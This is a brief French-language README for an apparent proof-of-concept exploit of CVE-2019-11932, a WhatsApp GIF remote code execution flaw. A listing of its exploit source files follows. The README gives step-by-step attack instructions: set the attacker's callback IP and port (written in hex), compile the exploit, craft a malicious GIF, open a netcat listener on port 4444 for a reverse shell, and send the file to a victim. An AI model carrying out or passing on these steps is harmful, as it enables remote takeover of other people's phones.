# CVE-2019-11932
Modifiez l'adresse d'écoute (celle de l'attaquant) ainsi que le port d'écoute dans le fichier exploit.c
<br />Code hexa suivant :
3139 322e 3136
382e 322e 3732 2034 3434 3420

<br /> <br />
Compilez le code : <br />
gcc -o exploit egif_lib.c exploit.c <br /> <br />
Lancez le fichier compilé ./exploit exploit.gif<br />
c/c l'output dans un gif <br /> <br />
Lancez le listener netcat : <br />
nc -lvp 4444 <br /> <br />
Envoyez à votre victime ! <br /> <br />
**Versions impactées :** 2.19.230 et en dessous <br />
Officiellement patché dans la version 2.19.244
Source : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ <br />
**Linkedin** : https://www.linkedin.com/in/thomas-lounis-749456175/
[4.0K] /data/pocs/69eb33d46e1b6666473867902bddf8707ca0d1e0
├── [3.3K] egif_lib.c
├── [5.2K] exploit.c
├── [ 11K] gif_lib.h
└── [ 795] README.md
0 directories, 4 files